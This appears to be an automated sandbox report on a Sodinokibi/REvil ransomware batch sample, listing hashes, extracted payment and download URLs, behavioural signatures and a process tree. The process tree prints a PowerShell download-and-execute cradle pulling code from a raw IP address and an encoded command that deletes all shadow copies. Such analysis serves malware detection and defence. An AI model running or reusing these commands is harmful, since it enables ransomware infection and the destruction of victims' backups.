Analysis
-
max time kernel
37s -
max time network
37s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
20-06-2020 08:10
Static task
static1
Behavioral task
behavioral1
Sample
f4bc334e44b117b825bf6ea74bf8306a.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
f4bc334e44b117b825bf6ea74bf8306a.bat
Resource
win10
General
-
Target
f4bc334e44b117b825bf6ea74bf8306a.bat
-
Size
213B
-
MD5
77b3d11eb5df3e1e5555caf2db33be1c
-
SHA1
1e66e03c4214e808d5d4b796d372938862be3cbd
-
SHA256
94d5147f9349eb4d28ca422092c7f0d81b4085c4ca82d9a88e465ae8d38edea0
-
SHA512
dba1003d91200c9f488ecf18ef70bd5177914c9a69d811185bcff4a7e0512419db4a7698cfc1a8618677c12d8f8d9b5322102e4bf8898a2c5314d48e34da7606
Malware Config
Extracted
http://185.103.242.78/pastes/f4bc334e44b117b825bf6ea74bf8306a
Extracted
C:\2nrqa8l7-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5E94B57D9460FBBB
http://decryptor.cc/5E94B57D9460FBBB
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeBackupPrivilege 1760 vssvc.exe Token: SeRestorePrivilege 1760 vssvc.exe Token: SeAuditPrivilege 1760 vssvc.exe Token: SeTakeOwnershipPrivilege 1460 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1460 powershell.exe -
Drops file in Program Files directory 18 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\microsoft sql server compact edition\v3.5\2nrqa8l7-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\2nrqa8l7-readme.txt powershell.exe File opened for modification \??\c:\program files\RegisterDebug.php powershell.exe File created \??\c:\program files\microsoft sql server compact edition\2nrqa8l7-readme.txt powershell.exe File opened for modification \??\c:\program files\StepSave.dotm powershell.exe File opened for modification \??\c:\program files\SuspendRestore.3gp powershell.exe File opened for modification \??\c:\program files\UseAssert.svgz powershell.exe File opened for modification \??\c:\program files\InitializeReceive.css powershell.exe File opened for modification \??\c:\program files\AssertRemove.eps powershell.exe File opened for modification \??\c:\program files\ConnectSet.kix powershell.exe File opened for modification \??\c:\program files\ConvertFromResize.dotx powershell.exe File opened for modification \??\c:\program files\TraceBackup.m1v powershell.exe File created \??\c:\program files\2nrqa8l7-readme.txt powershell.exe File opened for modification \??\c:\program files\InvokeSave.pub powershell.exe File opened for modification \??\c:\program files\LockSelect.ppsm powershell.exe File opened for modification \??\c:\program files\StepConvert.mpeg powershell.exe File opened for modification \??\c:\program files\SwitchMount.pptm powershell.exe File created \??\c:\program files (x86)\2nrqa8l7-readme.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\nb6.bmp" powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1356 wrote to memory of 1460 1356 cmd.exe powershell.exe PID 1356 wrote to memory of 1460 1356 cmd.exe powershell.exe PID 1356 wrote to memory of 1460 1356 cmd.exe powershell.exe PID 1356 wrote to memory of 1460 1356 cmd.exe powershell.exe PID 1460 wrote to memory of 1044 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 1044 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 1044 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 1044 1460 powershell.exe powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1460 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1044 powershell.exe 1044 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\f4bc334e44b117b825bf6ea74bf8306a.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f4bc334e44b117b825bf6ea74bf8306a');Invoke-NQONAR;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:1460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1044
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1760